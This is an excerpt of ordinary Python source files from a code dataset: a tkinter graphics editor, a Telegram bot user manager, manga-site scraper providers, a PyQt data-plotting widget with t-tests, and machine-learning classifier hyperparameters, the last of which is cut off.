{"seq_id":"53235168","text":"import tkinter as tk\nfrom functools import partial\nimport re\n\n\nclass Application(tk.Frame):\n\n    def __init__(self, master=None, title=\"\", **kwargs):\n        super().__init__(master, **kwargs)\n        self.master.title(title)\n        self.master.columnconfigure(0, weight=1)\n        self.master.columnconfigure(1, weight=1)\n        self.master.rowconfigure(0, weight=1)\n        self.grid(sticky=\"NEWS\")\n        self.create_widgets()\n        for column in range(self.grid_size()[0]):\n            self.columnconfigure(column, weight=1)\n        for row in range(self.grid_size()[1]):\n            self.rowconfigure(row, weight=1)\n\n    def create_widgets(self):\n        pass\n\n\nclass App(Application):\n    def create_text(self):\n        self.text = tk.Text(self, undo=True, wrap=tk.WORD)\n        self.text.grid(row=0, column=0, sticky=\"NEWS\")\n        self.text.bind('<KeyRelease>', self.on_insert_text)\n\n    def create_canvas(self):\n        self.canvas = tk.Canvas(self)\n        self.canvas.grid(row=0, column=1, sticky=\"NEWS\")\n        self.canvas.bind('<Button-1>', self.canvas_click)\n        self.canvas.bind('<B1-Motion>', self.on_motion)\n\n    def canvas_click(self, event):\n        overlap = self.canvas.find_overlapping(event.x, event.y, event.x + 1, event.y + 1)\n        if overlap:\n            return\n        self.create_object(event.x, event.y)\n        self.create_row_text()\n\n    def create_row_text(self):\n        obj_info = {\n            'type': self.canvas.type(self.current_obj),\n            'coord': self.canvas.coords(self.current_obj),\n            'border_color': self.canvas.itemcget(self.current_obj, 'outline'),\n            'fill_color': self.canvas.itemcget(self.current_obj, 'fill'),\n            'width': self.canvas.itemcget(self.current_obj, 'width')\n        }\n        self.text.insert(\n            tk.END,\n            f'{obj_info[\"type\"]}: <{obj_info[\"coord\"]}> {obj_info[\"width\"]} {obj_info[\"border_color\"]} {obj_info[\"fill_color\"]} \\\n'\n        )\n\n    def create_object(self, x, y):\n        self.current_start = x, y\n        self.current_end = x + 10, y + 10\n        self.current_obj = self.canvas.create_oval(*self.current_start, *self.current_end, fill=\"white\")\n        self.canvas.tag_bind(self.current_obj, '<Button-1>', partial(self.object_click, self.current_obj))\n\n    def object_click(self, tag, event):\n        self.current_obj_start = event.x, event.y\n        self.current_obj_coord = self.canvas.coords(tag)\n        self.current_obj = ''\n        self.canvas.tag_bind(tag, '<B1-Motion>', partial(self.object_movement, tag))\n\n    def object_movement(self, tag, event):\n        x1, y1, x2, y2 = self.current_obj_coord\n        start_x, start_y = self.current_obj_start\n        diff_x = event.x - start_x\n        diff_y = event.y - start_y\n\n        w, h = self.winfo_width(), self.winfo_height()\n        if x1 + diff_x >= 0 and x2 + diff_x <= h and y1 + diff_y >= 0 and y2 + diff_y <= w:\n            self.canvas.coords(tag, x1 + diff_x, y1 + diff_y, x2 + diff_x, y2 + diff_y)\n            self.change_text(tag, x1 + diff_x, y1 + diff_y, x2 + diff_x, y2 + diff_y)\n\n    def on_motion(self, event):\n        overlap = self.canvas.find_overlapping(event.x, event.y, event.x + 1, event.y + 1)\n        if overlap:\n            return\n\n        # change obj coords\n        self.canvas.coords(self.current_obj, *self.current_start, event.x, event.y)\n\n        # change text coords\n        self.change_text(self.current_obj, *self.current_start, event.x, event.y)\n\n    def change_text(self, tag, x1, y1, x2, y2):\n        if tag == '':\n            return\n        line = self.text.get(f'{tag}.0', f'{int(tag) + 1}.0')\n        s = line.find('<')\n        e = line.find('>')\n        line = line[:s + 1] + f'{[x1, y1, x2, y2]}' + line[e:]\n        self.text.delete(f'{tag}.0', f'{int(tag) + 1}.0')\n        self.text.insert(\n            f'{tag}.0',\n            line\n        )\n\n    def on_insert_text(self, event):\n        tag = int(self.text.index(tk.INSERT)[:1])\n        line = self.text.get(f'{tag}.0', f'{int(tag) + 1}.0')\n        configs = line.split(' ')\n        line_reg = r'oval: <\\\[(([0-9]{1,3}|[0-9]{1,3}\\\.[0-9]{1,2}), ){3}([0-9]{1,3}|[0-9]{1,3}\\\.[0-9]{1,2})\\\]> ([0-9]{1,3}\\\.[0-9]{1,2}) .+\\\n$'\n        try:\n            if not re.match(line_reg, line):\n                raise Exception('Wrong format!')\n            type, x1, y1, x2, y2, width, outline_color, fill_color, new_line = configs\n            self.canvas.itemconfig(tag, width=width, outline=outline_color, fill=fill_color)\n            self.canvas.coords(tag, x1[2:-1], y1[:-1], x2[:-1], y2[:-2])\n            self.text.tag_delete(f'red{tag}.0{int(tag) + 1}.0')\n        except Exception as e:\n            self.text.tag_add(f'red{tag}.0{int(tag) + 1}.0', f'{tag}.0', f'{int(tag) + 1}.0')\n            self.text.tag_configure(f'red{tag}.0{int(tag) + 1}.0', background='red')\n\n    def create_widgets(self):\n        self.create_text()\n        self.create_canvas()\n\n\napp = App(title=\"Graphics Editor\")\napp.mainloop()\n","sub_path":"05_SshAndSmartWidgents/GraphicsEditor.py","file_name":"GraphicsEditor.py","file_ext":"py","file_size_in_byte":5002,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"}
{"seq_id":"595749435","text":"from telegram.ext import CommandHandler\nfrom .base import MetafetishPickleDBBase\nimport cgi\n\n\nclass UserNotFoundException(Exception):\n    pass\n\n\nclass UserFlagGroupNotFoundException(Exception):\n    pass\n\n\nclass UserManager(MetafetishPickleDBBase):\n    def __init__(self, dbdir, cm):\n        super().__init__(__name__, dbdir, \"users\", True)\n        self.has_admin = True\n        if self.get_num_users() == 0:\n            self.has_admin = False\n        self.cm = cm\n\n    def register_with_dispatcher(self, dispatcher):\n        dispatcher.add_handler(CommandHandler('register', self.register))\n        dispatcher.add_handler(CommandHandler('profile_hide',\n                                              self.set_hide_profile))\n        dispatcher.add_handler(CommandHandler('profile_show',\n                                              self.set_show_profile))\n\n    def get_num_users(self):\n        return len(self.db.getall())\n\n    def is_valid_user(self, user_id):\n        if str(user_id) in self.db.getall():\n            return True\n        return False\n\n    def register(self, bot, update):\n        user_id = str(update.message.from_user.id)\n        if self.is_valid_user(user_id):\n            return\n        # Use the user_id as the dictionary key. Unfortunately the id is an\n        # int so this requires casting to make sure comparisons work.\n        user_db = {\"flags\": [\"admin\"] if not self.has_admin else [],\n                   \"fields\": {},\n                   \"show_profile\": False,\n                   \"username\": update.message.from_user.username,\n                   \"displayname\": \"%s %s\" % (update.message.from_user.first_name,\n                                             update.message.from_user.last_name)}\n        if not self.has_admin:\n            bot.sendMessage(update.message.chat.id,\n                            text=\"You're the first user, therefore you're the admin.\",\n                            parse_mode=\"HTML\")\n            self.has_admin = True\n        self.db.set(str(user_id), user_db)\n\n    def help(self, bot, update):\n        bot.sendMessage(update.message.chat.id,\n                        text=\"\"\"\nUser Module\n\nThe user module allows users to create profiles for themselves.\n\nEach user can also have profiles, which consist of a field name (with no whitespace) and a description of that field. This allows users to share whatever information they might want about themselves. Profile sharing is off by default, and can be turned on and off as needed.\n\nNote that field names are case insensitive for search, but will display as entered.\n\nCommands\n\n%s\n\"\"\" % (self.commands()),\n                        parse_mode=\"HTML\")\n\n    def commands(self):\n        return \"\"\"/userhelp - Display users help message.\n/useraddfield - Add or update a profile field.\n/userrmfield - Remove a profile field.\n/usershowprofile - Turn profile sharing on.\n/userhideprofile - Turn profile sharing off.\n/userprofile - Show the profile of another user.\"\"\"\n\n    def show_profile(self, bot, update, show_profile):\n        user_id = str(update.message.from_user.id)\n        self.db.dadd(user_id, (\"show_profile\", show_profile))\n        bot.sendMessage(update.message.chat.id,\n                        text=\"Profile display is now turned %s.\" % (\"ON\" if show_profile else \"OFF\"),\n                        parse_mode=\"HTML\")\n\n    def get_user_by_name_or_id(self, user_name_or_id):\n        user_id = None\n        user = None\n        if user_name_or_id in self.db.getall():\n            user_id = user_name_or_id\n            user = self.db.get(user_name_or_id)\n        else:\n            for id in self.db.getall():\n                data = self.db.get(id)\n                if data[\"username\"] == user_name_or_id:\n                    user_id = id\n                    user = data\n        return (user_id, user)\n\n    def edit_flag_conversation(self, bot, update, add):\n        bot.sendMessage(update.message.chat.id,\n                        text=\"What is the name or id of the user who you'd like to edit flags for?\")\n        while True:\n            (bot, update) = yield\n            user_name_or_id = update.message.text\n            (user_id, user) = self.get_user_by_name_or_id(user_name_or_id)\n            if user_id:\n                break\n            bot.sendMessage(update.message.chat.id,\n                            text=\"I can't find that user in my database, please try again or /cancel.\")\n\n        bot.sendMessage(update.message.chat.id,\n                        text=\"What is the name of the flag you would like to edit for %s?\" % (user[\"username\"]))\n        # TODO: show permissions flag keyboard here\n        (bot, update) = yield\n        user_flag = update.message.text\n        if add:\n            if user_flag not in user[\"flags\"]:\n                user[\"flags\"].append(user_flag)\n                self.db.set(user_id, user)\n                bot.sendMessage(update.message.chat.id,\n                                text=\"Added flag %s to %s\" % (user_flag, user_name_or_id))\n            else:\n                bot.sendMessage(update.message.chat.id,\n                                text=\"User %s already has flag %s\" % (user_name_or_id, user_flag))\n        else:\n            if user_flag in user[\"flags\"]:\n                user[\"flags\"].remove(user_flag)\n                self.db.set(user_id, user)\n                bot.sendMessage(update.message.chat.id,\n                                text=\"Removed flag %s from %s\" % (user_flag, user_name_or_id))\n            else:\n                bot.sendMessage(update.message.chat.id,\n                                text=\"User %s does not have flag %s\" % (user_name_or_id, user_flag))\n\n    def add_flag(self, bot, update):\n        c = self.edit_flag_conversation(bot, update, True)\n        c.send(None)\n        self.cm.add(update, c)\n\n    def remove_flag(self, bot, update):\n        c = self.edit_flag_conversation(bot, update, False)\n        c.send(None)\n        self.cm.add(update, c)\n\n    def has_flag(self, user_id, flag):\n        if type(user_id) is not str:\n            user_id = str(user_id)\n        try:\n            user = self.db.get(user_id)\n        except KeyError:\n            return False\n        if flag in user[\"flags\"]:\n            return True\n        return False\n\n    def get_fields(self, bot, update):\n        try:\n            (prof_command, prof_name) = update.message.text.split()\n        except:\n            prof_name = update.message.from_user.username\n        self.logger.warn(\"NAME %s\" % prof_name)\n        (user_id, user) = self.get_user_by_name_or_id(prof_name)\n        if not user_id or not user[\"show_profile\"]:\n            bot.sendMessage(update.message.chat.id,\n                            text=\"User not found, or does not have a public profile\")\n            return\n        fields = \"User Profile for 
%s\\n\\n\" % (prof_name)\n for (k, v) in user[\"fields\"].items():\n fields += \"%s\\n\\n%s\\n\\n\" % (k, v)\n bot.sendMessage(update.message.chat.id,\n text=fields,\n parse_mode=\"HTML\",\n disable_web_page_preview=True)\n\n def add_field_conversation(self, bot, update):\n user_id = str(update.message.from_user.id)\n bot.sendMessage(update.message.chat.id,\n text=\"What is the name of the profile field you'd like to add?\")\n (bot, update) = yield\n field_name = cgi.escape(update.message.text.strip())\n bot.sendMessage(update.message.chat.id,\n text=\"What would you like to set field %s to?\" % (field_name))\n # TODO: show permissions flag keyboard here\n (bot, update) = yield\n field_value = cgi.escape(update.message.text.strip())\n user = self.db.get(user_id)\n user[\"fields\"][cgi.escape(field_name)] = cgi.escape(field_value)\n self.db.set(user_id, user)\n bot.sendMessage(update.message.chat.id,\n text=\"Field %s is now set/updated in your profile.\" % (field_name))\n\n def remove_field_conversation(self, bot, update):\n user_id = str(update.message.from_user.id)\n bots.sendMessage(update.message.chat.id,\n text=\"What is the name of the profile field you'd like to remove?\")\n (bot, update) = yield\n field_name = cgi.escape(update.message.text.strip())\n user = self.db.get(user_id)\n try:\n del user[\"fields\"][cgi.escape(field_name)]\n except KeyError:\n bot.sendMessage(update.message.chat.id,\n text=\"Can't find field %s in your profile.\" % (field_name))\n return\n bot.sendMessage(update.message.chat.id,\n text=\"Field %s has been removed from your profile.\" % (field_name))\n\n def add_field(self, bot, update):\n c = self.add_field_conversation(bot, update)\n c.send(None)\n self.cm.add(update, c)\n\n def remove_field(self, bot, update):\n c = self.remove_field_conversation(bot, update)\n c.send(None)\n self.cm.add(update, c)\n\n def show_list(self, bot, update):\n users = \"User list:\\n\\n\"\n for k in self.db.getall():\n user_info = self.db.get(k)\n users += \"- %s : %s : %s\\n\" % (user_info[\"username\"],\n user_info[\"displayname\"],\n k)\n bot.sendMessage(update.message.chat.id,\n text=users)\n","sub_path":"mowcounterbot/users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":9470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"143746966","text":"from manmandon.provider import MMDChapterListProvider, MMDChapterProvider\nfrom pathlib import Path\nimport json\nfrom urllib.parse import urljoin\nfrom manmandon.util import parse_url_fname\nimport click\n\nclass DMZJChapters(MMDChapterListProvider):\n\n patterns = [\n r\"^https://(www\\.)?dmzj\\.com/info/[a-z]+/?$\"\n ]\n\n def resolve(self, uri):\n self.driver.get(uri)\n res = self.execute(Path(__file__).parent / \"chapters.js\")\n return json.loads(res)\n\nclass DMZJChapters2(MMDChapterListProvider):\n\n patterns = [\n r\"^https://manhua\\.dmzj\\.com/[a-z]+/?$\"\n ]\n\n def resolve(self, uri):\n self.driver.get(uri)\n res = self.execute(Path(__file__).parent / \"chapters2.js\")\n return json.loads(res)\n\nclass DMZJChapter(MMDChapterProvider):\n\n patterns = [\n r\"^https://manhua\\.dmzj\\.com/[a-z]+/\\d+\\.shtml/?$\"\n ]\n\n scope = []\n\n def flip(self):\n from selenium.webdriver.common.keys import Keys\n self.driver.find_element_by_tag_name(\"body\").send_keys(Keys.ARROW_RIGHT)\n\n def resolve(self, uri):\n\n self.driver.get(uri)\n res = self.execute(Path(__file__).parent / \"images.js\")\n img_urls = json.loads(res)\n directory = self.output_directory / 
self.driver.title\n directory.mkdir(exist_ok=True)\n\n with click.progressbar(length=len(img_urls), label=self.driver.title, show_pos=True) as bar:\n bar.update(0)\n for i, img_url in enumerate(img_urls):\n img_url = urljoin(\"https://images.dmzj.com/\", img_url)\n fname = directory / parse_url_fname(img_url)\n if not fname.exists():\n req = self.driver.wait_for_request(img_url, timeout=60)\n with open(fname, \"wb\") as fp:\n fp.write(req.response.body)\n self.sleep(3)\n bar.update(1)\n self.flip()\n\n del self.driver.requests\n\nproviders = [\n DMZJChapters,\n DMZJChapters2,\n DMZJChapter\n]\n","sub_path":"providers/dmzj/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"125208680","text":"from PyQt5.QtWidgets import (QApplication, QComboBox, QGridLayout, QGroupBox, QLabel, QPushButton,\n QFileDialog, QMessageBox, QWidget, QSizePolicy, QCheckBox, QTableWidget, QVBoxLayout,\n QTableWidgetItem, QLineEdit)\nfrom PyQt5.QtGui import QDoubleValidator, QIntValidator\nfrom matplotlib.backends.backend_qt5agg import FigureCanvas \nfrom matplotlib.backends.backend_qt5agg import NavigationToolbar2QT as NavigationToolbar\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport warnings, os, time\nfrom skimage.io import imsave\nimport scipy.ndimage as ndi\nfrom scipy.stats import ttest_ind\nfrom matplotlib.figure import Figure\nimport matplotlib.cm as cm\nfrom scipy.interpolate import interp1d\nimport matplotlib as mpl\nwarnings.filterwarnings(\"ignore\")\nfrom matplotlib import rc\nrc('font', size=12)\nrc('font', family='Arial')\n# rc('font', serif='Times')\nrc('pdf', fonttype=42)\n# rc('text', usetex=True)\n\nclass visualization_0d(QWidget):\n def __init__(self, data, name, background=None, colormap='gnuplot', parent=None):\n super(visualization_0d, self).__init__(parent)\n\n self.data = data\n self.dataPlot = data\n self.name = name\n if not background:\n self.background = [[0 for gastruloids in group] for group in data]\n else:\n self.background = background\n self.colormap = colormap\n\n self.make()\n\n def make(self):\n self.figure = Figure(figsize=(4, 4), dpi=100)\n self.canvas = FigureCanvas(self.figure)\n self.canvas.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)\n\n self.plotType = QComboBox()\n self.plotType.addItem('bar')\n self.plotType.addItem('violinplot')\n self.plotType.addItem('boxplot')\n\n self.colormap = QComboBox()\n self.colormap.addItem('jet')\n self.colormap.addItem('rainbow')\n self.colormap.addItem('gnuplot')\n self.colormap.addItem('gnuplot2')\n self.colormap.addItem('brg')\n self.colormap.addItem('tab10')\n self.colormap.addItem('Spectral')\n self.colormap.addItem('coolwarm')\n self.colormap.addItem('seismic')\n self.colormap.addItem('cool')\n self.colormap.addItem('spring')\n self.colormap.addItem('summer')\n self.colormap.addItem('autumn')\n self.colormap.addItem('winter')\n\n self.YnormBtn = QComboBox()\n self.YnormBtn.addItem('No normalization')\n self.YnormBtn.addItem('Global percentile')\n self.YnormBtn.addItem('Group percentile')\n self.YnormBtn.addItem('Manual')\n\n self.bckgBtn = QComboBox()\n self.bckgBtn.addItem('None')\n self.bckgBtn.addItem('Background')\n\n self.pxlsize = QLineEdit()\n self.pxlsize.setValidator( QDoubleValidator(0, 1000000, 5, notation=QDoubleValidator.StandardNotation) )\n self.pxlsize.setText('1.0')\n self.dimensionality = QLineEdit()\n self.dimensionality.setValidator( 
QIntValidator() )\n self.dimensionality.setText('1')\n\n self.groupSelection = self.makeGroupSelectionBtns()\n\n self.applyBtn = QPushButton('Apply Settings')\n self.applyBtn.clicked.connect(self.remakePlot)\n\n self.ttestBtn = QPushButton('Compute statistics')\n self.ttestBtn.clicked.connect(self.computeTtest)\n \n self.savexlsxBtn = QPushButton('Save Data as xlsx')\n self.savexlsxBtn.clicked.connect(self.saveData)\n\n lay = QGridLayout(self)\n lay.setSpacing(10)\n lay.addWidget(NavigationToolbar(self.canvas, self), 0,0,1,2)\n lay.addWidget(self.canvas, 1,0,1,2)\n lay.addWidget(QLabel('Y axis normalization:'), 2,0,1,1)\n lay.addWidget(self.YnormBtn, 2,1,1,1)\n lay.addWidget(QLabel('Background subtraction type:'), 3,0,1,1)\n lay.addWidget(self.bckgBtn, 3,1,1,1)\n lay.addWidget(QLabel('Pixel size/Scaler:'), 4,0,1,1)\n lay.addWidget(self.pxlsize, 4,1,1,1)\n lay.addWidget(QLabel('Dimensionality:'), 5,0,1,1)\n lay.addWidget(self.dimensionality, 5,1,1,1)\n lay.addWidget(QLabel('Plot type:'), 6,0,1,1)\n lay.addWidget(self.plotType, 6,1,1,1)\n lay.addWidget(QLabel('Colormap:'), 7,0,1,1)\n lay.addWidget(self.colormap, 7,1,1,1)\n lay.addWidget(self.groupSelection, 8,0,1,2)\n lay.addWidget(self.applyBtn, 9,0,1,2)\n lay.addWidget(self.ttestBtn, 10,0,1,2)\n lay.addWidget(self.savexlsxBtn, 11,0,1,2)\n\n self.remakePlot()\n\n self.setWindowTitle(self.name)\n QApplication.setStyle('Fusion')\n\n def makeGroupSelectionBtns(self):\n group = QGroupBox(\"Groups to plot\")\n self.groupPlotBtn = []\n for i in range(len(self.data)):\n self.groupPlotBtn.append(QCheckBox('Group '+str(i)))\n self.groupPlotBtn[-1].setChecked(True)\n \n self.legendBtn = QCheckBox('Legend')\n self.legendBtn.setChecked(False)\n\n self.rawBtn = QCheckBox('Plot raw data')\n self.rawBtn.setChecked(True)\n\n lay = QGridLayout()\n for i in range(len(self.data)):\n lay.addWidget(self.groupPlotBtn[i],i,0,1,1)\n lay.addWidget(self.legendBtn,0,1,1,1)\n lay.addWidget(self.rawBtn,1,1,1,1)\n\n group.setLayout(lay)\n return group\n\n def remakePlot(self):\n\n self.figure.clear()\n ax = self.figure.add_subplot(111)\n self.figure.subplots_adjust(top=0.95,right=0.95,left=0.15,bottom=0.15)\n ax.ticklabel_format(axis=\"x\", style=\"sci\", scilimits=(2,2))\n ax.ticklabel_format(axis=\"y\", style=\"sci\", scilimits=(0,2))\n ax.set_ylabel(self.name)\n\n n_groups = len(self.data)\n n_gastr = [len(self.data[group_idx]) for group_idx in range(n_groups)]\n\n # define colors\n cmap = cm.get_cmap(self.colormap.currentText())\n if n_groups == 1:\n colors = [cmap(0)]\n elif self.colormap.currentText()=='tab10':\n colors = [cmap(i) for i in range(n_groups)]\n else:\n colors = [cmap(i/(n_groups-1)) for i in range(n_groups)]\n\n # rearrange dataset\n data = [list(self.data[i].values) for i in range(n_groups)]\n\n # subtract background or not\n if self.bckgBtn.currentText() == 'Background':\n for i in range(n_groups):\n for k in range(n_gastr[i]):\n data[i][k] -= self.background[i][k]\n\n # normalize fluorescence intensity accordingly\n if self.YnormBtn.currentText() == 'Global percentile':\n flat = []\n for i in range(n_groups):\n for j in range(n_gastr[i]):\n flat.append(data[i][j])\n percs = np.percentile(np.array(flat),(.3,99.7))\n for i in range(n_groups):\n data[i] = np.clip((data[i]-percs[0])/(percs[1]-percs[0]),0.,1.)\n elif self.YnormBtn.currentText() == 'Group percentile':\n for i in range(n_groups):\n percs = np.percentile(np.array(data[i]),(.3,99.7))\n data[i] = np.clip((data[i]-percs[0])/(percs[1]-percs[0]),0.,1.)\n\n # use pixel size value and 
dimensionality\n for i in range(n_groups):\n for j in range(int(self.dimensionality.text())):\n data[i] = [v*float(self.pxlsize.text()) for v in data[i]]\n\n # make plot\n lines = []\n for i in range(n_groups):\n if self.groupPlotBtn[i].isChecked():\n # print(data)\n mean = np.mean(data[i])\n std= np.std(data[i])\n\n if self.plotType.currentText()=='bar':\n parts = ax.bar(i,mean,yerr=std,color=colors[i])\n elif self.plotType.currentText()=='violinplot':\n if data[i]!=[]:\n parts = ax.violinplot(data[i],[i],showmeans=True,showextrema=True)\n for pc in parts['bodies']:\n pc.set_color(colors[i])\n pc.set_alpha(0.5)\n parts = parts['bodies']\n elif self.plotType.currentText()=='boxplot':\n if data[i]!=[]:\n parts = ax.boxplot(data[i], positions=[i],\n notch=True,\n patch_artist=True)\n for item in ['boxes', 'whiskers', 'fliers', 'medians', 'caps']:\n plt.setp(parts[item], color=colors[i])\n plt.setp(parts[\"boxes\"], facecolor=colors[i])\n plt.setp(parts[\"boxes\"], alpha=.5)\n plt.setp(parts[\"fliers\"], markeredgecolor=colors[i])\n parts = parts['boxes']\n lines.append(parts[0])\n\n if self.rawBtn.isChecked():\n x = np.random.normal(i, 0.04, size=len(data[i]))\n ax.plot(x,data[i],'ok',alpha=.7,ms=2)\n\n # adjust axes lims\n ax.set_ylim(0,None)\n group_names = []\n for i in range(n_groups):\n if self.groupPlotBtn[i].isChecked():\n group_names.append('Group'+str(i+1))\n # print(groups)\n ax.set_xticks(range(len(group_names)))\n ax.set_xticklabels(group_names, rotation=15, fontsize=12)\n\n # add legend\n if self.legendBtn.isChecked():\n l = ax.legend(lines,group_names)\n l.get_frame().set_linewidth(0.0)\n\n self.dataPlot = data\n self.canvas.draw()\n\n def saveData(self):\n name,_ = QFileDialog.getSaveFileName(self, 'Save Data as xlsx File')\n fname, ext = os.path.splitext(name)\n if ext == '':\n name = name+'.xlsx'\n elif ext != '.xlsx':\n name = fname+'.xlsx'\n fname, ext = os.path.splitext(name)\n\n df = pd.DataFrame(self.dataPlot)\n df = df.transpose()\n df.columns =['Group '+str(i) for i in range(len(self.dataPlot))]\n df.to_excel(name)\n\n def computeTtest(self):\n n_groups = len(self.dataPlot)\n pvals = np.zeros((n_groups, n_groups))\n for i in range(n_groups):\n for j in range(n_groups):\n _, pvals[i,j] = ttest_ind(self.dataPlot[i], self.dataPlot[j])\n self.w = TtestTable(pvals)\n self.w.show()\n\nclass TtestTable(QWidget):\n def __init__(self, pvals, parent=None):\n super(TtestTable, self).__init__(parent)\n self.pvals = pvals\n\n self.setWindowTitle( \"Ttest: P values\" )\n self.createTable() \n\n self.saveBtn = QPushButton('Save pvals')\n self.saveBtn.clicked.connect(self.saveData)\n\n self.layout = QVBoxLayout() \n self.layout.addWidget(self.tableWidget) \n self.layout.addWidget(self.saveBtn)\n\n self.setLayout(self.layout)\n\n def createTable(self,):\n self.tableWidget = QTableWidget()\n n_groups = self.pvals.shape[0]\n\n #Row count \n self.tableWidget.setRowCount(n_groups) \n #Column count \n self.tableWidget.setColumnCount(n_groups)\n\n for i, row in enumerate(self.pvals):\n for j, val in enumerate(row):\n self.tableWidget.setItem(i,j, QTableWidgetItem('%.5f'%val))\n \n def saveData(self):\n n_groups = self.pvals.shape[0]\n name,_ = QFileDialog.getSaveFileName(self, 'Save Data as xlsx File')\n fname, ext = os.path.splitext(name)\n if ext == '':\n name = name+'.xlsx'\n elif ext != '.xlsx':\n name = fname+'.xlsx'\n fname, ext = os.path.splitext(name)\n\n df = pd.DataFrame(self.pvals)\n df = df.transpose()\n df.columns =['Group '+str(i) for i in range(n_groups)]\n df.index =['Group 
'+str(i) for i in range(n_groups)]\n # df = df.rename(index=['Group '+str(i) for i in range(len(self.dataPlot))])\n\n df.to_excel(name)\n\n","sub_path":"morgana/GUIs/visualize0d.py","file_name":"visualize0d.py","file_ext":"py","file_size_in_byte":12251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"106482107","text":"from d3m import container\nfrom d3m import utils as d3m_utils\nfrom d3m.container import pandas # type: ignore\nfrom d3m.primitive_interfaces import base\nfrom d3m.metadata import base as metadata_base, hyperparams, params\nfrom d3m.base import utils as base_utils\nfrom d3m.exceptions import PrimitiveNotFittedError\nfrom d3m.primitive_interfaces.base import CallResult\nfrom d3m.primitive_interfaces.supervised_learning import SupervisedLearnerPrimitiveBase\nfrom common_primitives.dataframe_to_ndarray import DataFrameToNDArrayPrimitive\nfrom common_primitives.ndarray_to_dataframe import NDArrayToDataFramePrimitive\n\n# Import config file\nfrom primitives_ubc.config_files import config\n\n# Import relevant libraries\nimport os\nimport time\nimport logging\nimport scipy.io\nimport numpy as np # type: ignore\nimport pandas as pd # type: ignore\nfrom collections import OrderedDict\nfrom typing import Any, cast, Dict, List, Union, Sequence, Optional, Tuple\n\n# Import CCFs functions\nfrom primitives_ubc.clfyCCFS.src.generate_CCF import genCCF\nfrom primitives_ubc.clfyCCFS.src.predict_from_CCF import predictFromCCF\n\n__all__ = ('CanonicalCorrelationForestsClassifierPrimitive',)\nlogger = logging.getLogger(__name__)\n\nInputs = container.DataFrame\nOutputs = container.DataFrame\n\n\nclass Params(params.Params):\n CCF_: Optional[Dict]\n attribute_columns_names: Optional[List[str]]\n target_columns_metadata: Optional[List[OrderedDict]]\n target_columns_names: Optional[List[str]]\n\n\nclass Hyperparams(hyperparams.Hyperparams):\n \"\"\"\n Hyper-parameters for this primitive.\n \"\"\"\n # Global Hyperparams\n global default_projdict\n default_projdict = OrderedDict()\n default_projdict['CCA'] = True\n\n nTrees = hyperparams.UniformInt(\n lower=1,\n upper=10000,\n default=100,\n description=\"Number of trees to create.\",\n semantic_types=['https://metadata.datadrivendiscovery.org/types/TuningParameter',\n 'https://metadata.datadrivendiscovery.org/types/ResourcesUseParameter',\n ],\n )\n parallelprocessing = hyperparams.UniformBool(\n default=True,\n description=\"Use multi-cpu processing.\",\n semantic_types=['https://metadata.datadrivendiscovery.org/types/ControlParameter']\n )\n lambda_ = hyperparams.Enumeration[str](\n values=['log', 'sqrt', 'all'],\n default='log',\n description=\"Number of features to subsample at each node\",\n semantic_types=['https://metadata.datadrivendiscovery.org/types/ControlParameter']\n )\n splitCriterion = hyperparams.Enumeration[str](\n values=['info', 'gini'],\n default='gini',\n description=\"Split criterion/impurity measure to use. 
Default is 'info' for classification with is entropy impurity/information split criterion.\",\n semantic_types=['https://metadata.datadrivendiscovery.org/types/TuningParameter']\n )\n minPointsLeaf = hyperparams.Hyperparameter[int](\n default=2,\n description=\"Minimum number of points allowed a leaf node for split to be permitted.\",\n semantic_types=['https://metadata.datadrivendiscovery.org/types/ControlParameter']\n )\n bSepPred = hyperparams.UniformBool(\n default=False,\n description=\"Whether to predict each class seperately as a multilabel classification problem (True) or treat classes within the same output as mutually exclusive (False)\",\n semantic_types=['https://metadata.datadrivendiscovery.org/types/ControlParameter']\n )\n taskWeights = hyperparams.Enumeration[str](\n values=['even', 'uneven'], # TODO: Add support for inputing weights list, currently only even supported.\n default='even',\n description=\"Weights to apply to each output task in calculating the gain.\",\n semantic_types=['https://metadata.datadrivendiscovery.org/types/ControlParameter']\n )\n bProjBoot = hyperparams.Enumeration[Union[bool, str]](\n values=['default', True, False],\n default='default',\n description=\"Whether to use projection bootstrapping. If set to default, then true unless lambda=D, i.e. we all features at each node. In this case we resort to bagging instead of projection bootstrapping\",\n semantic_types=['https://metadata.datadrivendiscovery.org/types/ControlParameter']\n )\n bBagTrees = hyperparams.Enumeration[Union[bool, str]](\n values=['default', True, False],\n default='default',\n description=\"Whether to use Breiman's bagging by training each tree on a bootstrap sample\",\n semantic_types=['https://metadata.datadrivendiscovery.org/types/ControlParameter']\n )\n projections = hyperparams.Hyperparameter[dict](\n default=default_projdict,\n description=\"Whether to use projection bootstrapping. If set to default, then true unless lambda=D, i.e. we all features at each node. In this case we resort to bagging instead of projection bootstrapping\",\n semantic_types=['https://metadata.datadrivendiscovery.org/types/ControlParameter']\n )\n treeRotation = hyperparams.Enumeration[str](\n values=['none', 'pca', 'random', 'rotationForest'],\n default='none',\n description='Pre-rotation to be applied to each tree seperately before rotating.',\n semantic_types=['https://metadata.datadrivendiscovery.org/types/ControlParameter']\n )\n propTrain = hyperparams.Bounded[float](\n lower=0.1,\n upper=1.0,\n default=1.0,\n description=\"Proportion of the data to train each tree on, but for large datasets it may be possible to only use a subset of the data for training each tree.\",\n semantic_types=['https://metadata.datadrivendiscovery.org/types/ControlParameter']\n )\n # Numerical stability options. Default values works for most cases\n epsilonCCA = hyperparams.Hyperparameter[float](\n default=1.0e-04,\n description=\"Tolerance parameter for rank reduction during the CCA. It can be desirable to lower if the data has extreme correlation, in which this finite value could eliminate the true signal\",\n semantic_types=['https://metadata.datadrivendiscovery.org/types/ControlParameter']\n )\n mseErrorTolerance = hyperparams.Hyperparameter[float](\n default=1e-6,\n description=\" When doing regression with mse splits, the node is made into a leaf if the mse (i.e. 
